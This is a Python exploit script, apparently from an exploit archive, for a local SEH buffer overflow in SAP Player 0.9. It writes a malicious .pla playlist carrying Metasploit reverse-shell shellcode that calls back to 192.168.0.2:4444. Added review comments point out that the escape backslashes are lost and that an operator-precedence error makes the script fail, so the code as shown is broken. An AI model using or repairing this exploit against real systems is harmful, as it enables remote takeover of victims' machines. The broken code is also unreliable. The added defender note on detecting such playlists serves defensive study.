# Title : SAP Player 0.9 (.pla) Universal Local Buffer Overflow Exploit (SEH)
# Published : 2009-09-15
# Author : mr_me
#!/usr/bin/python
#
###########################################################################################
#
# SAP player 0.9 (.pla) Universal Local BoF Exploit (SEH)
# Download: http://www.sorinara.com/sap/sap09.exe
# Credits go to: PLATEN
# Coded by: Steven Seeley aka mr_me
# Tested on Windows XP SP3
# It's not dead till it's buried ;)
#
############################################################################################
#
# windows/shell/reverse_tcp - 617 bytes (stage 1)
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# LHOST=192.168.0.2, EXITFUNC=seh, LPORT=4444
# Stage described in the header above: a metasploit windows/shell/reverse_tcp
# first stage, x86/alpha_mixed encoded, quoted there as 617 bytes.
# NOTE(review): as reproduced here every "\x" escape has lost its backslash
# (likely an extraction artefact), so each literal below is plain ASCII text
# ("xda", "xc8", ...) rather than the raw bytes the header describes; the
# script as shown therefore does not emit the payload its comments claim.
sc = ("xdaxc8xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4dx38x50x56x45x50x45x50x43x30x51x43x50x55"
"x46x36x50x57x4cx4bx42x4cx46x44x45x48x4cx4bx47"
"x35x47x4cx4cx4bx50x54x44x45x42x58x45x51x4bx5a"
"x4cx4bx51x5ax44x58x4cx4bx50x5ax47x50x43x31x4a"
"x4bx4bx53x46x52x47x39x4cx4bx47x44x4cx4bx43x31"
"x4ax4ex46x51x4bx4fx4bx4cx50x31x49x50x4ex4cx46"
"x58x4dx30x42x54x44x47x49x51x48x4fx44x4dx43x31"
"x49x57x4ax4bx4cx32x47x4bx43x4cx46x44x45x44x42"
"x55x4bx51x4cx4bx51x4ax47x54x45x51x4ax4bx45x36"
"x4cx4bx44x4cx50x4bx4cx4bx50x5ax45x4cx45x51x4a"
"x4bx4cx4bx45x54x4cx4bx43x31x4bx58x4ax4bx45x52"
"x50x31x49x50x51x4fx51x4ex51x4dx51x4bx49x52x44"
"x48x45x50x51x4ex43x5ax46x50x50x59x45x34x4cx4b"
"x45x49x4cx4bx51x4bx44x4cx4cx4bx51x4bx45x4cx4c"
"x4bx45x4bx4cx4bx51x4bx45x58x51x43x43x58x4cx4e"
"x50x4ex44x4ex4ax4cx4bx4fx48x56x4cx49x48x47x51"
"x43x45x38x51x44x49x5ax4ex4fx4cx51x4bx4fx49x46"
"x4bx31x4ax4cx43x30x45x51x45x50x43x30x50x50x51"
"x47x51x46x51x43x4bx39x4bx55x4ax48x45x4fx43x30"
"x45x50x43x30x4ax30x43x31x43x30x43x30x4ex56x42"
"x39x44x58x4bx57x4ex44x44x59x42x50x4bx59x4ax4c"
"x4cx39x4ex4ax45x30x4ex39x45x59x4bx45x4ex4dx48"
"x4bx4ax4dx4bx4cx47x4bx46x37x50x53x50x32x51x4f"
"x46x53x46x52x43x30x51x4bx4cx4dx50x4bx42x38x46"
"x31x4bx4fx49x47x4cx49x49x4fx4cx49x49x53x4cx4d"
"x43x45x42x34x42x4ax45x55x50x59x50x51x46x33x4b"
"x4fx50x34x4cx4fx4bx4fx51x45x43x34x51x49x4dx59"
"x44x44x4cx4ex4bx52x4cx32x46x4bx51x37x46x34x4b"
"x4fx47x47x4bx4fx51x45x51x38x50x31x49x50x46x30"
"x46x30x46x30x50x50x51x50x46x30x47x30x50x50x4b"
"x4fx51x45x47x54x4dx59x48x47x43x58x49x50x49x38"
"x45x50x43x32x42x48x43x32x43x30x42x31x51x4cx4d"
"x59x4bx51x43x5ax44x50x46x31x51x47x4bx4fx51x45"
"x51x30x42x4ax51x50x51x4ex46x36x49x51x4ax46x44"
"x46x46x36x49x51x4dx36x45x58x50x56x43x5ax43x30"
"x4bx4fx46x35x44x4cx4bx39x48x43x43x5ax43x30x50"
"x56x46x33x51x47x4bx4fx51x45x42x38x4bx4fx4ex33"
"x41x41")
# Layout of the generated playlist, in order (sizes are the script's own):
#   35272 bytes of filler, presumably reaching the SEH record the title refers
#   to -- TODO confirm against the player build named in the header;
#   4 bytes for the next-SEH slot, 4 bytes overwriting the handler address,
#   10 bytes of NOP-style filler, the stage above, then trailing filler.
# Defender note: the intended artefact is a fixed-size ".pla" file
# (35272 + 4 + 4 + 3720 = 39000 bytes as written) consisting almost entirely
# of long runs of a single byte; size and very low entropy make such
# playlists straightforward to flag before a legacy player opens them.
eviL = ("x41" * 35272);
eviL += ("xebx06x90x90")   # next-SEH slot (same missing-backslash caveat as sc)
eviL += ("x27x4ax01x10")   # handler-address overwrite; byte order assumed little-endian -- verify
eviL += ("x90" * 10)       # filler placed before the stage
eviL += (sc)
# BUG(review): operator precedence. `"x43" * 3720` is evaluated first and
# yields a str; subtracting `len(sc)` from a str raises TypeError, so this
# line aborts the script before any file is written.
eviL += ("x43" * 3720 - len(sc) - 10)
# Python 2 print statements; the script does not parse on Python 3.
print "[+] SAP player 0.9 (.pla) Universal Local BoF Exploit"
print "[+] Creating payload"
# `file` shadows the Python 2 builtin of the same name; the playlist is opened
# in text mode, and no `with` block guarantees the close on error.
file = open('mr_mes_playlist.pla','w');
file.write(eviL);
file.close();
print "[+] pla file created successfully!"